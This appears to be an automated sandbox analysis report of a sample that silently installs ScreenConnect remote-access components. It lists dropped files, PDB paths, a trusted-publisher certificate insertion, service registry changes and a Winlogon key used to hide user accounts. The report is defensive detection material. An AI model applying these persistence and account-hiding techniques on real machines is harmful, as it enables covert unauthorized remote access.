                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2237912718.000002768A21E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736567404.0000000002242000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: 96r3GgxntQ.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A06C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1734370181.0000000005562000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1782306577.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1784635687.000000001B880000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A21A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1730092141.00000000008AD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A21A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A21E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736567404.0000000002242000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A068000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1734596134.0000000005692000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                  Source: 96r3GgxntQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: 96r3GgxntQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: 96r3GgxntQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: 96r3GgxntQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: 96r3GgxntQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Detected unpacking (creates a PE file in dynamic memory)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeUnpacked PE file: 11.2.ScreenConnect.ClientService.exe.5560000.0.unpack
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.drStatic PE information: 0xBC0F508C [Tue Dec 24 14:17:48 2069 UTC]
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00BB1000
                  Source: 96r3GgxntQ.exeStatic PE information: real checksum: 0x212e6 should be: 0x1fbec
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB1BC0 push ecx; ret 0_2_00BB1BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFE7DC2D2A5 pushad ; iretd 2_2_00007FFE7DC2D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFE7DD48463 push eax; ret 2_2_00007FFE7DD4846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFE7DD48452 pushad ; ret 2_2_00007FFE7DD4845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFE7DD4B91F pushad ; ret 2_2_00007FFE7DD4B92A
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFE7DD400BD pushad ; iretd 2_2_00007FFE7DD400C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFE7DD43AD4 push 8470B948h; ret 2_2_00007FFE7DD43AD9
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FFE7DD4BA69 push edi; ret 2_2_00007FFE7DD4BA6A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFE7DD57569 push ebx; iretd 10_2_00007FFE7DD5756A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFE7DD500BD pushad ; iretd 10_2_00007FFE7DD500C1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFE7DD57A99 push ecx; ret 10_2_00007FFE7DD57A9C
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFE7DD800BD pushad ; iretd 13_2_00007FFE7DD800C1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFE7E092FA3 pushfd ; iretd 13_2_00007FFE7E092FA4
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFE7E094832 push ss; iretd 13_2_00007FFE7E094833
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFE7E09587E push ss; iretd 13_2_00007FFE7E095895
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dllJump to dropped file
                  Source: ScreenConnect.ClientService.dll.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (ae095c23-8e22-4747-b9a0-c8c8b34ba57d)

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Contains functionality to hide user accounts
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.1734370181.0000000005562000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.1782306577.0000000002D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.1784635687.000000001B880000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll0.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.Windows.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
